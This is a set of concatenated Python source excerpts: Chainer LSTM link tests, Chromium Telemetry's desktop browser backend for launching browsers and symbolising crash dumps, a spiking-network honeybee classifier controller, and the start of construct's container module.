        self.link = links.LSTM(5, 7)
        self.x = chainer.Variable(
            numpy.random.uniform(-1, 1, (3, 5)).astype(numpy.float32))
        # NOTE(review): c and h are built 5-wide although the link's state
        # is 7-wide; set_state presumably does not validate shapes here --
        # confirm against links.LSTM.set_state.
        self.c = chainer.Variable(
            numpy.random.uniform(-1, 1, (3, 5)).astype(numpy.float32))
        self.h = chainer.Variable(
            numpy.random.uniform(-1, 1, (3, 5)).astype(numpy.float32))

    def check_state(self):
        # State is lazily created on the first forward pass.
        self.assertIsNone(self.link.c)
        self.assertIsNone(self.link.h)
        self.link(self.x)
        self.assertIsNotNone(self.link.c)
        self.assertIsNotNone(self.link.h)

    def test_state_cpu(self):
        self.check_state()

    @attr.gpu
    def test_state_gpu(self):
        self.link.to_gpu()
        self.x.to_gpu()
        self.check_state()

    def check_set_state(self, c, h):
        # set_state must install the given arrays as the link's state.
        self.link.set_state(c, h)
        self.assertIsInstance(self.link.c.data, self.link.xp.ndarray)
        testing.assert_allclose(c.data, self.link.c.data)
        self.assertIsInstance(self.link.h.data, self.link.xp.ndarray)
        testing.assert_allclose(h.data, self.link.h.data)

    def test_set_state_cpu(self):
        self.check_set_state(self.c, self.h)

    @attr.gpu
    def test_set_state_gpu(self):
        self.link.to_gpu()
        self.check_set_state(self.c, self.h)

    def check_reset_state(self):
        # reset_state drops the state back to None after a forward pass.
        self.link(self.x)
        self.link.reset_state()
        self.assertIsNone(self.link.c)
        self.assertIsNone(self.link.h)

    def test_reset_state_cpu(self):
        self.check_reset_state()

    @attr.gpu
    def test_reset_state_gpu(self):
        self.link.to_gpu()
        self.x.to_gpu()
        self.check_reset_state()
class TestLSTMToCPUToGPU(unittest.TestCase):

    """Tests that LSTM state arrays follow the link across device moves."""

    def setUp(self):
        self.link = links.LSTM(5, 7)
        data = numpy.random.uniform(-1, 1, (3, 5)).astype(numpy.float32)
        self.x = chainer.Variable(data)

    def check_to_cpu(self, s):
        # Moving to CPU must be idempotent: transfer twice, check each time
        # that the state lives in the link's current array module.
        for _ in range(2):
            self.link.to_cpu()
            self.assertIsInstance(s.data, self.link.xp.ndarray)

    def test_to_cpu_cpu(self):
        self.link(self.x)
        self.check_to_cpu(self.link.c)
        self.check_to_cpu(self.link.h)

    @attr.gpu
    def test_to_cpu_gpu(self):
        self.link.to_gpu()
        self.x.to_gpu()
        self.link(self.x)
        self.check_to_cpu(self.link.c)
        self.check_to_cpu(self.link.h)

    def check_to_cpu_to_gpu(self, s):
        # Exercise gpu -> gpu -> cpu -> gpu round trips; after every move the
        # state must match the link's array module.
        for move in (self.link.to_gpu, self.link.to_gpu,
                     self.link.to_cpu, self.link.to_gpu):
            move()
            self.assertIsInstance(s.data, self.link.xp.ndarray)

    @attr.gpu
    def test_to_cpu_to_gpu_cpu(self):
        self.link(self.x)
        self.check_to_cpu_to_gpu(self.link.c)
        self.check_to_cpu_to_gpu(self.link.h)

    @attr.gpu
    def test_to_cpu_to_gpu_gpu(self):
        self.link.to_gpu()
        self.x.to_gpu()
        self.link(self.x)
        self.check_to_cpu_to_gpu(self.link.c)
        self.check_to_cpu_to_gpu(self.link.h)
@testing.parameterize(
    {'in_size': 10, 'out_size': 10},
    {'in_size': 10, 'out_size': 40},
)
class TestStatelessLSTM(unittest.TestCase):
    # Forward-pass tests for the stateless LSTM link, parameterized over
    # matching and non-matching input/output sizes.

    def setUp(self):
        """Build a StatelessLSTM with random fixed weights and a random input."""
        self.link = links.StatelessLSTM(self.in_size, self.out_size)
        upward = self.link.upward.W.data
        upward[...] = numpy.random.uniform(-1, 1, upward.shape)
        lateral = self.link.lateral.W.data
        lateral[...] = numpy.random.uniform(-1, 1, lateral.shape)
        self.link.zerograds()
        self.upward = upward.copy()  # fixed on CPU
        self.lateral = lateral.copy()  # fixed on CPU
        x_shape = (4, self.in_size)
        self.x = numpy.random.uniform(-1, 1, x_shape).astype(numpy.float32)

    def check_forward(self, x_data):
        # The stateless link must agree with functions.lstm when the caller
        # threads the (c, h) state through explicitly.
        xp = self.link.xp
        x = chainer.Variable(x_data)
        c1, h1 = self.link(None, None, x)
        # Expected first step: functions.lstm starting from a zero cell state.
        c0 = chainer.Variable(xp.zeros((len(self.x), self.out_size),
                                       dtype=self.x.dtype))
        c1_expect, h1_expect = functions.lstm(c0, self.link.upward(x))
        testing.assert_allclose(h1.data, h1_expect.data)
        testing.assert_allclose(c1.data, c1_expect.data)
        # Second step reuses the returned (c1, h1) as incoming state.
        c2, h2 = self.link(c1, h1, x)
        c2_expect, h2_expect = \
            functions.lstm(c1_expect,
                           self.link.upward(x) + self.link.lateral(h1))
        testing.assert_allclose(h2.data, h2_expect.data)
        testing.assert_allclose(c2.data, c2_expect.data)

    def test_forward_cpu(self):
        self.check_forward(self.x)

    @attr.gpu
    def test_forward_gpu(self):
        self.link.to_gpu()
        self.check_forward(cuda.to_gpu(self.x))
testing.run_module(__name__, __file__)
| |
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import glob
import heapq
import logging
import os
import os.path
import shutil
import subprocess as subprocess
import sys
import tempfile
import time
from telemetry.core import exceptions
from telemetry.core import util
from telemetry.core.backends import browser_backend
from telemetry.core.backends.chrome import chrome_browser_backend
from telemetry.util import path
from telemetry.util import support_binaries
class DesktopBrowserBackend(chrome_browser_backend.ChromeBrowserBackend):
  """The backend for controlling a locally-executed browser instance, on Linux,
  Mac or Windows.
  """
  def __init__(self, browser_options, executable, flash_path, is_content_shell,
               browser_directory, output_profile_path, extensions_to_load):
    """Configure the backend and create the temporary profile.

    Args:
      browser_options: options object forwarded to the base backend.
      executable: path to the browser binary; raises if empty.
      flash_path: optional PPAPI Flash plugin path (asserted to exist if set).
      is_content_shell: content shell supports neither tab control,
          extensions nor profiles.
      browser_directory: directory containing the browser binary.
      output_profile_path: if set, the profile is written there and preserved
          after Close().
      extensions_to_load: extensions to install; must be empty for content
          shell.
    """
    super(DesktopBrowserBackend, self).__init__(
        supports_tab_control=not is_content_shell,
        supports_extensions=not is_content_shell,
        browser_options=browser_options,
        output_profile_path=output_profile_path,
        extensions_to_load=extensions_to_load)
    # Initialize fields so that an explosion during init doesn't break in Close.
    self._proc = None
    self._tmp_profile_dir = None
    self._tmp_output_file = None
    self._executable = executable
    if not self._executable:
      raise Exception('Cannot create browser, no executable found!')
    assert not flash_path or os.path.exists(flash_path)
    self._flash_path = flash_path
    self._is_content_shell = is_content_shell
    if len(extensions_to_load) > 0 and is_content_shell:
      raise browser_backend.ExtensionsNotSupportedException(
          'Content shell does not support extensions.')
    self._browser_directory = browser_directory
    self._port = None
    self._profile_dir = None
    # Minidumps from browser crashes are collected here (see GetStackTrace).
    self._tmp_minidump_dir = tempfile.mkdtemp()
    self._crash_service = None
    self._SetupProfile()

  def _SetupProfile(self):
    """Prepare the (possibly copied) profile directory the browser will use."""
    if not self.browser_options.dont_override_profile:
      if self._output_profile_path:
        # If both |_output_profile_path| and |profile_dir| are specified then
        # the calling code will throw an exception, so we don't need to worry
        # about that case here.
        self._tmp_profile_dir = self._output_profile_path
      else:
        self._tmp_profile_dir = tempfile.mkdtemp()
      profile_dir = self._profile_dir or self.browser_options.profile_dir
      if profile_dir:
        if self._is_content_shell:
          logging.critical('Profiles cannot be used with content shell')
          sys.exit(1)
        logging.info("Using profile directory:'%s'." % profile_dir)
        # Replace the freshly-created temp dir with a copy of the seed profile.
        shutil.rmtree(self._tmp_profile_dir)
        shutil.copytree(profile_dir, self._tmp_profile_dir)
    if self.browser_options.use_devtools_active_port:
      # No matter whether we're using an existing profile directory or
      # creating a new one, always delete the well-known file containing
      # the active DevTools port number.
      port_file = self._GetDevToolsActivePortPath()
      if os.path.isfile(port_file):
        try:
          os.remove(port_file)
        except Exception as e:
          logging.critical('Unable to remove DevToolsActivePort file: %s' % e)
          sys.exit(1)

  def _GetDevToolsActivePortPath(self):
    # Chrome writes its ephemeral DevTools port into this well-known file.
    return os.path.join(self.profile_directory, 'DevToolsActivePort')

  def _GetCrashServicePipeName(self):
    # Ensure a unique pipe name by using the name of the temp dir.
    return r'\\.\pipe\%s_service' % os.path.basename(self._tmp_minidump_dir)

  def _StartCrashService(self):
    """Launch crash_service on Windows; returns the Popen handle or None."""
    os_name = self._browser.platform.GetOSName()
    if os_name != 'win':
      return None
    return subprocess.Popen([
        support_binaries.FindPath('crash_service', os_name),
        '--no-window',
        '--dumps-dir=%s' % self._tmp_minidump_dir,
        '--pipe-name=%s' % self._GetCrashServicePipeName()])

  def _GetCdbPath(self):
    """Return an installed cdb.exe debugger path, or None if not found."""
    possible_paths = (
        'Debugging Tools For Windows',
        'Debugging Tools For Windows (x86)',
        'Debugging Tools For Windows (x64)',
        os.path.join('Windows Kits', '8.0', 'Debuggers', 'x86'),
        os.path.join('Windows Kits', '8.0', 'Debuggers', 'x64'),
        os.path.join('win_toolchain', 'vs2013_files', 'win8sdk', 'Debuggers',
                     'x86'),
        os.path.join('win_toolchain', 'vs2013_files', 'win8sdk', 'Debuggers',
                     'x64'),
    )
    for possible_path in possible_paths:
      app_path = os.path.join(possible_path, 'cdb.exe')
      app_path = path.FindInstalledWindowsApplication(app_path)
      if app_path:
        return app_path
    return None

  def HasBrowserFinishedLaunching(self):
    # In addition to the functional check performed by the base class, quickly
    # check if the browser process is still alive.
    if not self.IsBrowserRunning():
      raise exceptions.ProcessGoneException(
          "Return code: %d" % self._proc.returncode)
    if self.browser_options.use_devtools_active_port:
      # The Telemetry user selected the new code path to start DevTools on
      # an ephemeral port. Wait for the well-known file containing the port
      # number to exist.
      port_file = self._GetDevToolsActivePortPath()
      if not os.path.isfile(port_file):
        # File isn't ready yet. Return false. Will retry.
        return False
      # Attempt to avoid reading the file until it's populated.
      got_port = False
      try:
        if os.stat(port_file).st_size > 0:
          with open(port_file) as f:
            port_string = f.read()
            self._port = int(port_string)
            logging.info('Discovered ephemeral port %s' % self._port)
            got_port = True
      except Exception:
        # Both stat and open can throw exceptions.
        pass
      if not got_port:
        # File isn't ready yet. Return false. Will retry.
        return False
    return super(DesktopBrowserBackend, self).HasBrowserFinishedLaunching()

  def GetBrowserStartupArgs(self):
    """Build the command-line flags used to launch the browser."""
    args = super(DesktopBrowserBackend, self).GetBrowserStartupArgs()
    if self.browser_options.use_devtools_active_port:
      # Port 0 asks Chrome for an ephemeral port, reported via the
      # DevToolsActivePort file (see HasBrowserFinishedLaunching).
      self._port = 0
    else:
      self._port = util.GetUnreservedAvailableLocalPort()
    logging.info('Requested remote debugging port: %d' % self._port)
    args.append('--remote-debugging-port=%i' % self._port)
    args.append('--enable-crash-reporter-for-testing')
    args.append('--use-mock-keychain')
    if not self._is_content_shell:
      args.append('--window-size=1280,1024')
      if self._flash_path:
        args.append('--ppapi-flash-path=%s' % self._flash_path)
      if not self.browser_options.dont_override_profile:
        args.append('--user-data-dir=%s' % self._tmp_profile_dir)
    return args

  def SetProfileDirectory(self, profile_dir):
    """Set the seed profile directory; must be called before _SetupProfile."""
    # Make sure _profile_dir hasn't already been set.
    assert self._profile_dir is None
    if self._is_content_shell:
      logging.critical('Profile creation cannot be used with content shell')
      sys.exit(1)
    self._profile_dir = profile_dir

  def Start(self):
    """Launch the browser process and wait for it to come up.

    Closes the backend (and re-raises) if the browser fails to start.
    """
    assert not self._proc, 'Must call Close() before Start()'
    args = [self._executable]
    args.extend(self.GetBrowserStartupArgs())
    if self.browser_options.startup_url:
      args.append(self.browser_options.startup_url)
    env = os.environ.copy()
    env['CHROME_HEADLESS'] = '1'  # Don't upload minidumps.
    env['BREAKPAD_DUMP_LOCATION'] = self._tmp_minidump_dir
    env['CHROME_BREAKPAD_PIPE_NAME'] = self._GetCrashServicePipeName()
    self._crash_service = self._StartCrashService()
    logging.debug('Starting Chrome %s', args)
    if not self.browser_options.show_stdout:
      # Capture browser stdout/stderr into an unbuffered temp file so
      # GetStandardOutput can read it back.
      self._tmp_output_file = tempfile.NamedTemporaryFile('w', 0)
      self._proc = subprocess.Popen(
          args, stdout=self._tmp_output_file, stderr=subprocess.STDOUT, env=env)
    else:
      self._proc = subprocess.Popen(args, env=env)
    try:
      self._WaitForBrowserToComeUp()
    except:
      self.Close()
      raise

  @property
  def pid(self):
    # Process id of the launched browser, or None if not started.
    if self._proc:
      return self._proc.pid
    return None

  @property
  def browser_directory(self):
    return self._browser_directory

  @property
  def profile_directory(self):
    return self._tmp_profile_dir

  def IsBrowserRunning(self):
    # poll() is None while the child process is still alive.
    return self._proc and self._proc.poll() == None

  def GetStandardOutput(self):
    """Return the browser's captured stdout/stderr, or '' if unavailable."""
    if not self._tmp_output_file:
      if self.browser_options.show_stdout:
        # This can happen in the case that loading the Chrome binary fails.
        # We print rather than using logging here, because that makes a
        # recursive call to this function.
        print >> sys.stderr, "Can't get standard output with --show-stdout"
      return ''
    self._tmp_output_file.flush()
    try:
      with open(self._tmp_output_file.name) as f:
        return f.read()
    except IOError:
      return ''

  def _GetMostRecentMinidump(self):
    """Return the newest .dmp file in the minidump dir, or None."""
    dumps = glob.glob(os.path.join(self._tmp_minidump_dir, '*.dmp'))
    if not dumps:
      return None
    most_recent_dump = heapq.nlargest(1, dumps, os.path.getmtime)[0]
    if os.path.getmtime(most_recent_dump) < (time.time() - (5 * 60)):
      logging.warning('Crash dump is older than 5 minutes. May not be correct.')
    return most_recent_dump

  def _GetStackFromMinidump(self, minidump):
    """Symbolize a minidump into a stack trace string, or None on failure.

    On Windows this shells out to cdb.exe; elsewhere it strips the dump to
    the 'MDMP' magic and runs minidump_stackwalk against breakpad symbols
    copied from the browser directory.
    """
    os_name = self._browser.platform.GetOSName()
    if os_name == 'win':
      cdb = self._GetCdbPath()
      if not cdb:
        logging.warning('cdb.exe not found.')
        return None
      output = subprocess.check_output([cdb, '-y', self._browser_directory,
                                        '-c', '.ecxr;k30;q', '-z', minidump])
      # Slice out just the stack between the 'ChildEBP' header and the
      # debugger's quit marker.
      stack_start = output.find('ChildEBP')
      stack_end = output.find('quit:')
      return output[stack_start:stack_end]
    stackwalk = support_binaries.FindPath('minidump_stackwalk', os_name)
    if not stackwalk:
      logging.warning('minidump_stackwalk binary not found.')
      return None
    symbols = glob.glob(os.path.join(self._browser_directory, '*.breakpad*'))
    if not symbols:
      logging.warning('No breakpad symbols found.')
      return None
    with open(minidump, 'rb') as infile:
      # Drop any leading bytes before the 'MDMP' magic so stackwalk accepts
      # the dump; write the stripped copy next to the original.
      minidump += '.stripped'
      with open(minidump, 'wb') as outfile:
        outfile.write(''.join(infile.read().partition('MDMP')[1:]))
    symbols_path = os.path.join(self._tmp_minidump_dir, 'symbols')
    for symbol in sorted(symbols, key=os.path.getmtime, reverse=True):
      if not os.path.isfile(symbol):
        continue
      with open(symbol, 'r') as f:
        # The breakpad symbol header line is: MODULE <os> <arch> <sha> <name>.
        fields = f.readline().split()
        if not fields:
          continue
        sha = fields[3]
        binary = ' '.join(fields[4:])
      symbol_path = os.path.join(symbols_path, binary, sha)
      if os.path.exists(symbol_path):
        continue
      os.makedirs(symbol_path)
      shutil.copyfile(symbol, os.path.join(symbol_path, binary + '.sym'))
    return subprocess.check_output([stackwalk, minidump, symbols_path],
                                   stderr=open(os.devnull, 'w'))

  def GetStackTrace(self):
    """Return a symbolized crash stack, falling back to browser stdout."""
    most_recent_dump = self._GetMostRecentMinidump()
    if not most_recent_dump:
      logging.warning('No crash dump found. Returning browser stdout.')
      return self.GetStandardOutput()
    stack = self._GetStackFromMinidump(most_recent_dump)
    if not stack:
      logging.warning('Failed to symbolize minidump. Returning browser stdout.')
      return self.GetStandardOutput()
    return stack

  def __del__(self):
    self.Close()

  def Close(self):
    """Shut down the browser, crash service and temporary state.

    Safe to call multiple times and from __del__; every field is reset so a
    second call is a no-op.
    """
    super(DesktopBrowserBackend, self).Close()
    # Shutdown politely if the profile may be used again.
    if self._output_profile_path and self.IsBrowserRunning():
      self._proc.terminate()
      try:
        util.WaitFor(lambda: not self.IsBrowserRunning(), timeout=5)
        self._proc = None
      except util.TimeoutException:
        logging.warning('Failed to gracefully shutdown. Proceeding to kill.')
    # Shutdown aggressively if the above failed or if the profile is temporary.
    if self.IsBrowserRunning():
      self._proc.kill()
    self._proc = None
    if self._crash_service:
      self._crash_service.kill()
      self._crash_service = None
    if self._output_profile_path:
      # If we need the output then double check that it exists.
      if not (self._tmp_profile_dir and os.path.exists(self._tmp_profile_dir)):
        raise Exception("No profile directory generated by Chrome: '%s'." %
                        self._tmp_profile_dir)
    else:
      # If we don't need the profile after the run then cleanup.
      if self._tmp_profile_dir and os.path.exists(self._tmp_profile_dir):
        shutil.rmtree(self._tmp_profile_dir, ignore_errors=True)
        self._tmp_profile_dir = None
    if self._tmp_output_file:
      self._tmp_output_file.close()
      self._tmp_output_file = None
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
$Id$
Classes and functions to control network and classifier operation.
"""
# just run the network.
import os
import sys
import time
import csv
import cPickle
import logging
# Module-level logger, named after this source file.
lg = logging.getLogger(os.path.basename(__file__))
lg.setLevel(logging.INFO)  # set to level 5 (< logging.DEBUG) to obtain pre and post patterns.
import configobj
import numpy
#import NeuroTools.signals as nts
from network import AntennalLobe
from network import BeeBrain
#from utils import utility_funcs
#import init_sim
def usage():
    """Print command-line usage information for this script to stdout."""
    print "Usage: %s configfile sim_type"%os.path.basename(__file__)
    print "configfile: Path to network configuration file"
    print "sim_type: sim or hw"
from neuclar.network_utilities import *
class ALController(object):
    """
    Set up the antennal lobe network and control simulation, data
    presentation etc.
    """

    def __init__(self, pynn, config):
        """Build the antennal lobe network on the given pyNN backend."""
        lg.info('building network')
        self.pynn = pynn
        self.net = AntennalLobe(pynn, config)

    def run_network(self, duration):
        """Advance the simulation by ``duration`` milliseconds."""
        lg.info('starting simulation for %.1f ms' % duration)
        self.pynn.run(duration)

    def set_pattern(self, pattern):
        """Apply one stimulus pattern to the antennal lobe drivers."""
        lg.info("setting pattern in the AL.")
        self.net.set_pattern(pattern)

    def set_pattern_batch(self, patterns, time_per_pattern):
        """
        set the driver spike rates such that all patterns are presented in
        sequence.
        """
        lg.info('setting pattern batch in the AL.')
        self.net.set_batch_pattern(patterns, time_per_pattern)

    def retrieve_spikes(self):
        """Fetch the spikes recorded in the network."""
        lg.info('retrieving spikes.')
        return self.net.retrieve_spikes()
class BrainController(object):
    """
    set up the honeybee brain, control simulation, present stimuli, learn.
    """
    def __init__(self, pynn, config):
        """Build the BeeBrain model and apply optional weight randomization.

        Parameters:
        pynn - pyNN backend module used for simulation.
        config - configobj-style configuration with 'network', 'simulation'
                 and 'learningrule' sections.
        """
        lg.info('setting up bee brain.')
        self.pynn = pynn
        self.config = config
        self.stim = 0  # counts stimuli presented via test_pattern
        self.brain = BeeBrain(pynn, config)
        assert (config['simulation']['calib_AL'] == 'False'),\
            "This version does not support AL calibration."
        if self.config['network'].has_key('randomize_weights_pndriver'):
            # driver -> PNs
            std = config['network'].as_float('randomize_weights_pndriver')
            if std > 0.:
                orig_weight = self.config['network'].as_float('w_driver_PN')
                self.brain.AL.randomize_pndriver_weights(orig_weight, std)
        if self.config['network'].has_key('randomize_weights_lndriver'):
            # PNs -> LNs
            std = config['network'].as_float('randomize_weights_lndriver')
            if std > 0.:
                orig_weight = config['network'].as_float('w_PN_LN')
                self.brain.AL.randomize_lndriver_weights(orig_weight, std)
        self.brain.AL.setup_lateral_inhibition_from_config()

    def set_pattern(self, pattern):
        """
        set the given input pattern as stimulus in the AL.
        """
        lg.info('setting stimulation pattern in the AL.')
        self.brain.AL.set_pattern(pattern)

    def set_pattern_batch(self, patterns, time_per_pattern):
        """
        set several input patterns to be presented in sequence in the AL.
        """
        lg.info('setting stimulation pattern in the AL.')
        self.brain.AL.set_pattern_batch(patterns, time_per_pattern)

    def run_network(self, duration):
        """
        run the network for duration ms.
        """
        lg.info('running the simulation for %.1f ms.'%duration)
        self.pynn.run(duration)
        lg.info('run completed.')

    def get_spikes(self, duration=None):
        """
        Retrieve spikes from all neurons after one stimulus.

        parameters:
        duration - how far to look back for recorded spikes. If None, guess
                   from config.

        Returns dictionary with spike matrices.
        """
        if duration is None:
            duration = self.config['simulation'].as_float('duration')
        # get ORN spikes
        driverspikes = self.brain.AL.get_spikemat('drivers',
                                                  not_older_than=duration)
        # get PN spikes
        pnspikes = self.brain.AL.get_spikemat('PNs', not_older_than=duration)
        # get LN spikes
        lnspikes = self.brain.AL.get_spikemat('LNs', not_older_than=duration)
        # get MB dec exc spikes
        decexcspikes = self.brain.MBext.get_spikemat(pop='exc',
                                                     not_older_than=duration)
        # get MB dec inh spikes
        decinhspikes = self.brain.MBext.get_spikemat(pop='inh',
                                                     not_older_than=duration)
        ret = {'drivers':driverspikes,
               'PNs': pnspikes,
               'LNs': lnspikes,
               'dec_exc': decexcspikes,
               'dec_inh': decinhspikes}
        return ret

    def test_pattern(self, pattern_tuple, class_ids='not used', timing_dict=None):
        """
        Present the pattern and determine the network's choice.

        Returns the number of spikes produced in each decision population.

        Parameters:
        pattern_tuple - pattern tuple as returned from PatternServer
                        (id, pattern, classlabel)
        class_ids - list of strings containing all possible class labels (not
                    used but necessary in classifiers)
        timing_dict - dictionary in which times for 'run' and 'manage' will be
                      stored (for benchmarking).
        """
        start_time = time.time()
        lg.info('testing pattern.')
        self.stim +=1
        id = pattern_tuple[0]
        pattern = pattern_tuple[1]
        target = pattern_tuple[2]
        self.set_pattern(pattern)
        pat_creat_time = time.time()
        duration = self.config['simulation'].as_float('duration')
        self.run_network(duration)
        post_run_time = time.time()
        # The hardware backend cannot window spike counts by time.
        if self.pynn.__package__ == 'pyNN.hardware':
            t_back = None
        else:
            t_back = duration
        dn_spikecounts = self.brain.MBext.get_spikecountmat(
            not_older_than=t_back)
        # Mean spike count per decision population = the network's "vote".
        dec_pop_rates = numpy.mean(dn_spikecounts, axis=1)
        lg.info('pattern %s %s %s yielded response %s'%(id, str(pattern),
                                                        target, str(dec_pop_rates)))
        end_time = time.time()
        if not (timing_dict is None):
            timing_dict['total_test'] = end_time - start_time
            timing_dict['create_spiketrains'] = pat_creat_time - start_time
            timing_dict['run'] = post_run_time - pat_creat_time
            timing_dict['compute_rates'] = end_time - post_run_time
        return dec_pop_rates

    def learn_pattern(self, pattern_tuple, class_ids, timing_dict=None):
        """
        Present a pattern and update the weights in the network according to the
        Fusi learning rule.

        Returns the decision population rates produced when the pattern was
        presented. (NOTE(review): an earlier docstring claimed a boolean /
        None return, but the code clearly returns dec_pop_rates.)

        Parameters:
        pattern_tuple - pattern tuple as returned from PatternServer
                        (id, pattern, classlabel)
        class_ids - list of strings containing all possible class labels
        timing_dict - dictionary in which times for 'run' and 'manage' will be
                      stored (for benchmarking).
        """
        start_time = time.time()
        lg.info('performing learning.')
        # determine winner population and class
        dec_pop_rates = self.test_pattern(pattern_tuple, timing_dict=timing_dict)
        post_test_time = time.time()
        id = pattern_tuple[0]
        target = pattern_tuple[2]
        # determine if classification is correct
        winner = numpy.argmax(dec_pop_rates)
        winner_id = class_ids[winner]
        dec_correct = winner_id == pattern_tuple[2]
        lg.info('Classifier: %s %s -> %s -- %s.'%(
            id, target, winner_id, ['WRONG','CORRECT'][int(dec_correct)]))
        lg.debug("dec_pop_rates: %s"%str(dec_pop_rates))
        lg.debug("argmax(dec_pop_rates): %d"%numpy.argmax(dec_pop_rates))
        lg.debug('class_ids: %s'%str(class_ids))
        assess_classification_time = time.time()
        if numpy.sum(dec_pop_rates) > 1.: #there was at least one spike
            # update weights accordingly
            self.change_predec_weights_learning(dec_pop_rates, dec_correct)
            if self.config['learningrule'].as_bool('learn_AL_inh'):
                pnrates = self.brain.AL.retrieve_last_rates('PNs')
                if not numpy.any(pnrates > self.config['learningrule'].as_float('pn_learn_thresh')):
                    # decrease overall inhibition if pn rate is too low for learning
                    self.change_AL_inh_weights_const(-0.015/15)
                else:
                    lnrates = self.brain.AL.retrieve_last_rates('LNs')
                    self.change_AL_inh_weights_learning(pnrates, lnrates, dec_correct)
        else:
            lg.info('Classifier: %s %s -> %s.'%(id, target, 'no output spikes'))
            # increase all weights by one step
            self.change_predec_weights_const(0.005/15.)
        end_time = time.time()
        if not (timing_dict is None):
            timing_dict['total_train'] = end_time - start_time
            timing_dict['assess_classification'] = \
                assess_classification_time - post_test_time
            timing_dict['compute_new_weights'] = \
                end_time - assess_classification_time
        return dec_pop_rates

    def change_predec_weights_const(self, dw):
        """
        Change the weight coming into the decision layer by constant amount dw.
        Weights are clipped to the configured [w_min, w_max] range.
        """
        lg.info('increasing all predec weights by %.5f'%dw)
        connmat = self.brain.AL.connmat_al_mbext
        w_min = self.config['learningrule'].as_float('w_min')
        w_max = self.config['learningrule'].as_float('w_max')
        for conn in connmat.flat:
            # entries equal to 0 mark absent connections
            if conn == 0:
                continue
            w = conn.getWeights(gather=False)[0]
            new_w = w + dw
            if new_w > w_max:
                new_w = w_max
            elif new_w < w_min:
                new_w = w_min
            conn.setWeights(new_w)

    def change_predec_weights_learning(self, dec_pop_rates, dec_correct):
        """
        Modify the weights to the decision population according to the learning
        rule.

        Parameters:
        dec_pop_rates - list of rates from the decision populations
        dec_correct - boolean indicating whether decision was correct
        """
        winner = numpy.argmax(dec_pop_rates)
        # consider only spikes which occurred during last presentation
        rank_thresh = self.config['learningrule'].as_int('rank_thresh')
        rate_thresh = self.config['learningrule'].as_float('rate_thresh')
        duration = self.config['simulation'].as_float('duration')
        #obtain pre spikes
        if self.brain.MBcalyx is None:
            # must be AL then
            lg.debug('Learning from AL.')
            pre_spikes = self.brain.AL.get_spikemat('PNs',
                                                    not_older_than=duration)
        else:
            raise(Exception('need to refactor to spikemat.'))
            # NOTE(review): the code below is unreachable after the raise;
            # it is kept as a template for the pending MB refactoring.
            # All KCs project to the decision layer. Get spikes for KC population.
            lg.debug('Learning from MB.')
            mb_spike_dict = self.brain.MBcalyx.retrieve_spikes(poplist=['KCs'],
                                                               not_older_than=duration)
            pre_spikes = mb_spike_dict['KCs']
        # calculate pre rates (spikes per second) for every presynaptic unit
        pre_rates = numpy.zeros(pre_spikes.shape, dtype=float)
        for i,s in enumerate(pre_spikes.flat):
            pre_rates.flat[i] = len(s)/duration*1000.
        lg.info('Pre pattern: %s'%str(["%.2f"%numpy.mean(s) for s in pre_rates]))
        # find the n highest responding units, n < rank_thresh
        units_sortidx = numpy.argsort(pre_rates.flat)
        units_sortidx = units_sortidx[::-1]
        # check whether rate_thresh or rank_thresh is relevant
        if rank_thresh > (len(units_sortidx)-1):
            lg.debug('setting rank_thresh of %d to max rank of %d'%(
                rank_thresh,len(units_sortidx)-1))
            rank_thresh = (len(units_sortidx)-1)
        if pre_rates.flat[units_sortidx[rank_thresh]] < rate_thresh:
            # NOTE(review): 'rates' is never used after this line -- confirm
            # whether it can be removed.
            rates = [pr for pr in pre_rates.flat[units_sortidx]]
            # searchsorted on the ascending view gives the number of units
            # below rate_thresh; convert to a cutoff rank from the top.
            cutoff = numpy.searchsorted(pre_rates.flat[units_sortidx[::-1]], rate_thresh)
            cutoff -= len(pre_rates.flat)
            cutoff *= -1
            lg.debug('rate_threshing at rank %d'%cutoff)
        else:
            cutoff = rank_thresh
            lg.debug('rank_threshing at %d'%cutoff)
        unit_id_tup = []
        for idx in units_sortidx[:cutoff]:
            unit_id_tup.append(numpy.unravel_index(idx,pre_rates.shape))
        lg.info('learning: updating weights from %d pre_units'%len(unit_id_tup) +
                " targeting decpop %d"%(winner))
        # set compute mode for dw
        w_min = self.config['learningrule'].as_float('w_min')
        w_max = self.config['learningrule'].as_float('w_max')
        try:
            calc_dw = self.config['learningrule']['dw_style']
        except KeyError:
            calc_dw = 'static_dw'
        if calc_dw == 'static_dw':
            delta_w_plus_int = self.config['learningrule'].as_int('delta_w_plus_int')
            delta_w_minus_int = self.config['learningrule'].as_int('delta_w_minus_int')
            delta_w_plus = float(delta_w_plus_int) * 0.005/15.
            delta_w_minus = float(delta_w_minus_int) * 0.005/15.
            # reward correct decisions, punish incorrect ones
            if dec_correct:
                dw = delta_w_plus
            else:
                dw = -delta_w_minus
        elif calc_dw == 'soltani_wang':
            # NOTE(review): this mode is unfinished and raises further below
            # before any weight is computed.
            if dec_correct:
                w_ref = w_max
            else:
                w_ref = w_min
        # loop over the to-be-modified connections and set new weight.
        connmat = self.brain.AL.connmat_al_mbext
        for id in unit_id_tup:
            conns = connmat[id[0], id[1], winner, :]
            for conn in conns.flat:
                if conn == 0:
                    continue
                w = conn.getWeights(gather=False)[0]
                if calc_dw == 'static_dw':
                    new_w = w + dw
                    if new_w > w_max:
                        new_w = w_max
                    elif new_w < w_min:
                        new_w = w_min
                elif calc_dw == 'soltani_wang':
                    #TODO: compute dw like Soltani/Wang
                    # dw = 1/1+exp(-w_max)
                    raise(Exception(
                        'Still need to figure out how S-W actually computerd dw.'))
                # skip no-op updates below numeric noise level
                if numpy.abs(new_w - w) < 0.000001:
                    lg.debug('learning: not changing weight ' +
                             '(old: %.5f, new: %.5f)'%(w, new_w))
                    continue
                else:
                    lg.debug('learning: changing weights for '+
                             'glom: %d pn:%d decp:%d'%(id[0], id[1], winner) +
                             '(old: %.5f, new: %.5f)'%(w, new_w))
                conn.setWeights(new_w)
| |
"""
Various containers exposed to the user.
"""
from construct.lib.py3compat import *
globalfullprinting = None
def setglobalfullprinting(enabled):
    r"""
    Set full printing for every Container instance.

    When enabled, ``str(container)`` renders the complete content of bytes
    and strings; otherwise (and by default) long values are truncated.

    :param enabled: bool to enable or disable full printing, or None to default
    """
    global globalfullprinting
    globalfullprinting = enabled
def getglobalfullprinting():
    """Used internally: report whether full printing is currently enabled."""
    return True if globalfullprinting else False
def recursion_lock(retval="<recursion detected>", lock_name="__recursion_lock__"):
    """Used internally.

